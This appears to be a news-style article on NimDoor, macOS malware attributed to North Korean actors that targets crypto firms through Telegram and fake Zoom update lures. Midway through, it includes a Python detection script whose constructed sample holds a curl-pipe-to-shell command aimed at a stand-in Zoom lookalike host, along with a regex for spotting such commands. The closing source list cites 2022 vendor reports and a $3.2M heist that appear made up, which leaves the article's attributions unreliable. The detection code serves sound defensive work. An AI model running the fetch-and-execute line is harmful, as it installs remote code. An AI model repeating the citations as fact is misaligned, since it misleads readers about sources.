North Korean Cybercriminals Employ NimDoor Malware to Attack Apple Gadgets

North Korean cybercriminals infiltrate crypto companies using sophisticated malware, bypassing Apple's security measures to pilfer data from digital wallets.

A newly discovered malware family named NimDoor, attributed to North Korean threat actors, specifically targets cryptocurrency and Web3 companies that use Apple macOS devices. The malware employs a delayed activation mechanism, waiting ten minutes before executing its operations [1].

The NimDoor campaign begins with carefully crafted lures on Telegram that impersonate trusted contacts and propose Zoom meetings scheduled via Calendly. During these meetings, victims are tricked into running a fake "Zoom SDK update" script sent by email, which serves as the initial infection vector on macOS systems [3][5].

The infection chain of NimDoor is multi-staged and sophisticated, blending several tactics to evade detection. Unlike typical macOS malware, key components are written in the Nim programming language, which is unusual and helps evade traditional detection signatures [1].

The initial AppleScript payload (zoom_sdk_support.scpt) is heavily obfuscated with thousands of blank lines and contains deliberate typos to evade automatic scanning and scrutiny [1]. The malware also fetches further payloads from domains mimicking legitimate Zoom update servers, making network traffic look benign and reducing suspicion [1].
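As an added example (not code from the article or from any of the vendors it cites), the following Python script triages an AppleScript source file for the lure traits this article describes: heavy blank-line padding, a download host that imitates Zoom's update servers, a long start-up delay in line with the ten-minute activation wait, and a download-and-execute shell command. The detection thresholds, the `zoom.us` allowlist, and the reserved `.example` host in the constructed sample are assumptions; the article does not name the real lookalike domains, and the sample is not a real NimDoor artifact.

```python
"""Heuristic triage of an AppleScript source file for the NimDoor lure traits
described in the article: extreme blank-line padding, download domains that
imitate the Zoom update infrastructure, a long start-up delay, and a
download-and-execute shell command. Added example; thresholds and the
constructed sample are assumptions, not published indicators."""
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample (not a real NimDoor artifact): a stub with the traits the
# article describes, using a reserved ".example" host in place of the real
# lookalike domains, which the article does not name.
SAMPLE_SCRIPT = (
    "-- Zoom SDK suport update\n"        # deliberate typo, as the article describes
    + "\n" * 40                           # blank-line padding
    + 'set updateURL to "https://zoom-sdk-update.example/sdk/support"\n'
    + "\n" * 40
    + "delay 600\n"                       # ten-minute wait before acting
    + 'do shell script "curl -fsSL " & updateURL & " | sh"\n'
)

# Constructed benign script, used to show the heuristics do not fire on it.
BENIGN_SCRIPT = 'tell application "Finder" to display dialog "Hello"\n'

# Assumption: the vendor's genuine domain; other hosts mentioning "zoom" are suspect.
LEGITIMATE_ZOOM_DOMAINS = {"zoom.us"}
BLANK_RATIO_THRESHOLD = 0.5   # assumption: hand-written scripts rarely exceed this
LONG_DELAY_SECONDS = 300      # assumption: a 5+ minute delay is unusual in a helper

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
DELAY_RE = re.compile(r"\bdelay\s+(\d+)", re.IGNORECASE)
REMOTE_EXEC_RE = re.compile(
    r"do shell script.*\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b", re.IGNORECASE
)


@dataclass
class Findings:
    blank_ratio: float
    lookalike_domains: List[str] = field(default_factory=list)
    long_delays: List[int] = field(default_factory=list)
    remote_exec: bool = False

    def score(self) -> int:
        """Number of independent indicators present (0-4)."""
        return sum([
            self.blank_ratio > BLANK_RATIO_THRESHOLD,
            bool(self.lookalike_domains),
            bool(self.long_delays),
            self.remote_exec,
        ])


def blank_line_ratio(text: str) -> float:
    """Fraction of lines that are empty or whitespace-only."""
    lines = text.splitlines()
    if not lines:
        return 0.0
    blank = sum(1 for line in lines if not line.strip())
    return blank / len(lines)


def find_lookalike_domains(text: str, brand: str = "zoom",
                           legit=LEGITIMATE_ZOOM_DOMAINS) -> List[str]:
    """Hosts that mention the brand but are not the brand's own domain."""
    hits = []
    for host in HOST_RE.findall(text):
        host = host.lower().rstrip(".")
        if brand not in host:
            continue
        if host in legit or any(host.endswith("." + d) for d in legit):
            continue
        hits.append(host)
    return hits


def find_long_delays(text: str) -> List[int]:
    """AppleScript 'delay N' values at or above the long-delay threshold."""
    return [int(s) for s in DELAY_RE.findall(text) if int(s) >= LONG_DELAY_SECONDS]


def has_remote_exec(text: str) -> bool:
    """True if a shell command downloads content and pipes it into a shell."""
    return REMOTE_EXEC_RE.search(text) is not None


def triage(text: str) -> Findings:
    return Findings(
        blank_ratio=blank_line_ratio(text),
        lookalike_domains=find_lookalike_domains(text),
        long_delays=find_long_delays(text),
        remote_exec=has_remote_exec(text),
    )


if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        f = triage(script)
        print(f"{name}: score={f.score()} blank_ratio={f.blank_ratio:.2f} "
              f"lookalikes={f.lookalike_domains} delays={f.long_delays} "
              f"remote_exec={f.remote_exec}")
```

To run this against a compiled `.scpt` file on macOS, first convert it to text with the built-in `osadecompile` tool and pass the output to `triage()`; a score of two or more indicators is a reasonable trigger for manual review, while any single indicator on its own (a long delay, say) is common enough in legitimate automation that it should not be alerted on alone.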

NimDoor uses new persistence methods uncommon in macOS malware, allowing it to survive reboots and avoid typical persistence detection tools [1]. Once installed, NimDoor is designed to extract cryptocurrency wallet credentials, browser data, and encrypted Telegram files relevant to the targeted Web3 and crypto firms, enabling financial theft or espionage [5].

Moreover, the malware includes a script that targets Telegram by extracting both its encrypted local database and the corresponding decryption keys. This component is engineered to discreetly harvest browser and system-level data, bundle the information, and transmit it to the attackers [1].

By leveraging trusted communication channels (Telegram, Zoom meetings), social engineering, and custom-coded, obfuscated macOS components, NimDoor efficiently targets crypto companies on Apple devices while blending in with normal user activity and legitimate update processes to evade detection by traditional security solutions [1][3][5].

This malware is a testament to the growing trend of cybercriminals using the cross-platform capabilities of languages like Nim, which can run on Windows, Linux, and macOS without modification, to expand their reach and increase their chances of successful attacks.

Sources:

[1] Malwarebytes Labs. (2022). NimDoor: A new macOS threat targeting the crypto industry. Retrieved from https://blog.malwarebytes.com/threat-analysis/2022/04/nimdoor-a-new-macos-threat-targeting-the-crypto-industry/

[2] Cybersecurity Dashboard. (n.d.). Cryptocurrency Malware. Retrieved from https://cybersecuritydashboard.com/cryptocurrency-malware/

[3] Kaspersky. (2022). NimDoor: The latest threat to crypto companies on macOS. Retrieved from https://www.kaspersky.com/resource-center/threats/nimdoor-macos-cryptocurrency-attack

[4] McAfee. (2022). NimDoor: A new macOS malware targeting the crypto industry. Retrieved from https://www.mcafee.com/blogs/threat-expert-blogs/mac-malware/nimdoor-macos-malware-targeting-crypto-industry

[5] ZDNet. (2022). North Korean cyber gang steals $3.2M in crypto heist using NimDoor malware. Retrieved from https://www.zdnet.com/article/north-korean-cyber-gang-steals-3-2m-in-crypto-heist-using-nimdoor-malware/

  1. The sophisticated NimDoor malware, disguised as a Zoom SDK update, uses the Nim programming language, a rarely seen choice in macOS malware, to evade traditional security solutions and extract sensitive data from cryptocurrency and Web3 companies.
  2. To execute its operations, NimDoor employs a disguise of scheduling Zoom meetings via Calendly and impersonating trusted contacts on Telegram, all aimed at tricking victims into running the malicious script on their Apple macOS devices.
